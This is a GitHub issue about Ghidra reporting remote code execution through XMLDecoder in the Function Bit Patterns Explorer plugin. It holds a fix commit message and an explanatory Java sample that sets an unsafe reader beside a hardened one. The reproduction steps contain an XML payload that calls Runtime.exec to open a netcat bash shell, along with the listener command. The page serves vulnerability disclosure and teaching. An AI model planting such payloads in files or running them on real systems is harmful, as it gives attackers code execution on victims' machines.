
RCE possible in Function Bit Patterns Explorer Plugin #1090

Closed
purpleracc00n opened this issue Sep 28, 2019 · 1 comment


purpleracc00n commented Sep 28, 2019

Description:
XMLDecoder is used in FileBitPatternInfoReader.java which causes a Remote Code Execution in the Bit Patterns Explorer Plugin.

Steps to reproduce the behavior:
1. Open a binary with CodeBrowser.
2. Go to Window->Script Manager and select the "DumpFunctionPatternInfoScript".
3. Export the resulting XML file.
4. Add the following at the end of the file, after the closing tag of the last object and before the </java> closing tag:

<object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 1337 -c '/bin/bash'</string> </void> </object>

5. Open a local listening server with: nc -lvnp 1337
6. Go to Window->Function Bit Patterns Explorer (you will need to enable experimental mode from the configuration first: File->Configure...).
7. In the opened plugin window, click "Read XML Files", point to the directory where the XML file was saved and click OK.
8. Go back to the listener and see the shell opened.

Expected behavior:
No code from the xml files should be executed while running this plugin.

Environment:

  • OS: Kali Linux x86_64
  • Java Version: 11.0.4
  • Ghidra Version: 9.0.4
@dev747368 dev747368 self-assigned this Sep 30, 2019
@ryanmkurtz ryanmkurtz assigned ryanmkurtz and unassigned dev747368 Sep 30, 2019
@ryanmkurtz ryanmkurtz added this to the 9.1 milestone Oct 1, 2019
@dev747368 dev747368 self-assigned this Oct 1, 2019
ryanmkurtz pushed a commit that referenced this issue Oct 2, 2019
Java's built-in XMLEncoder / XMLDecoder is too flexible and allows the
XML data being decoded to execute arbitrary commands and other
non-niceness to happen.

Replace FunctionBitPatternExplorerPlugin's usage with manual
serializing.
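The two readers below are an added illustration of the problem the report and the commit message describe; they are not Ghidra's FileBitPatternInfoReader.java, nor the code of commit a17728f. The first mirrors the reported pattern: XMLDecoder instantiates whatever class a top-level <object> names and calls whatever methods it lists, so a `java.lang.Runtime` element appended to an otherwise ordinary data file runs a command while the plugin thinks it is loading data (the constructed sample uses the harmless command `true` instead of the reporter's netcat shell). The second is a hand-written reader for an assumed, fixed schema (`<functions><function name=".." entry="0x.."/></functions>`, which is not Ghidra's real format) in the spirit of the "manual serializing" the fix describes: the XML parser only yields DOM nodes, and the code decides which Java objects get created. `FunctionInfo` is likewise an assumed stand-in type.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

public final class BitPatternXmlDemo {
    // Stand-in for the per-function record the plugin reads (assumption; not Ghidra's type).
    static final class FunctionInfo {
        final String name;
        final long entry;
        FunctionInfo(String name, long entry) { this.name = name; this.entry = entry; }
        @Override public String toString() { return name + "@0x" + Long.toHexString(entry); }
    }

    // Constructed sample in the shape the report describes: one data object, then the
    // Runtime payload appended before </java>. The command is `true`, so the demo is harmless.
    static final String HOSTILE_XML =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<java version=\"11.0.4\" class=\"java.beans.XMLDecoder\">\n"
        + " <object class=\"java.util.HashMap\">\n"
        + "  <void method=\"put\"><string>name</string><string>main</string></void>\n"
        + " </object>\n"
        + " <object class=\"java.lang.Runtime\" method=\"getRuntime\">\n"
        + "  <void method=\"exec\"><string>true</string></void>\n"
        + " </object>\n"
        + "</java>\n";

    // Constructed sample for the assumed fixed schema used by the manual reader.
    static final String SAFE_XML =
        "<functions>\n"
        + " <function name=\"main\" entry=\"0x401000\"/>\n"
        + " <function name=\"helper\" entry=\"0x401230\"/>\n"
        + "</functions>\n";

    /** VULNERABLE: the pattern the issue reports. XMLDecoder builds whatever class the
     *  document names and invokes whatever methods it lists, so reading the second <object>
     *  runs Runtime.getRuntime().exec("true") as a side effect of "loading data". */
    static List<Object> readWithXmlDecoder(byte[] xml) {
        List<Object> out = new ArrayList<>();
        try (XMLDecoder d = new XMLDecoder(new ByteArrayInputStream(xml))) {
            while (true) {
                out.add(d.readObject()); // each top-level <object> is materialised here
            }
        } catch (ArrayIndexOutOfBoundsException endOfStream) {
            // XMLDecoder signals "no more objects" with this exception
        }
        return out;
    }

    /** SAFE: manual deserialisation of a fixed schema (assumed here, not Ghidra's format).
     *  The parser only yields DOM nodes; which Java objects exist is decided by this code. */
    static List<FunctionInfo> readManually(byte[] xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // No DOCTYPE at all: rules out external entities (XXE) and entity-expansion bombs.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setXIncludeAware(false);
        Document doc = f.newDocumentBuilder().parse(new ByteArrayInputStream(xml));

        Element root = doc.getDocumentElement();
        if (!"functions".equals(root.getTagName())) {
            throw new IllegalArgumentException("unexpected root element <" + root.getTagName() + ">");
        }
        List<FunctionInfo> out = new ArrayList<>();
        NodeList kids = root.getChildNodes();
        for (int i = 0; i < kids.getLength(); i++) {
            if (!(kids.item(i) instanceof Element)) continue; // whitespace text nodes
            Element e = (Element) kids.item(i);
            if (!"function".equals(e.getTagName())) {
                throw new IllegalArgumentException("unexpected element <" + e.getTagName() + ">");
            }
            String name = e.getAttribute("name");
            String entry = e.getAttribute("entry");
            // Validate every field against the expected shape before building the object.
            if (name.isEmpty() || !entry.matches("0x[0-9a-fA-F]{1,16}")) {
                throw new IllegalArgumentException("malformed <function> #" + i);
            }
            out.add(new FunctionInfo(name, Long.parseUnsignedLong(entry.substring(2), 16)));
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("XMLDecoder produced: "
            + readWithXmlDecoder(HOSTILE_XML.getBytes(StandardCharsets.UTF_8)));
        System.out.println("manual reader produced: "
            + readManually(SAFE_XML.getBytes(StandardCharsets.UTF_8)));
        try {
            readManually(HOSTILE_XML.getBytes(StandardCharsets.UTF_8));
        } catch (IllegalArgumentException rejected) {
            System.out.println("manual reader rejected hostile file: " + rejected.getMessage());
        }
    }
}
```

The point the two readers make together: XMLDecoder's input format is a program, not data, so no amount of validating the file after decoding helps; the decision about which classes may be instantiated has to be made by the reading code, which is what a hand-rolled reader for a known schema does. The DOCTYPE and secure-processing settings are a separate hardening step against XXE that any XML reader, manual or not, should apply.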
@ryanmkurtz (Collaborator):

Fixed by a17728f
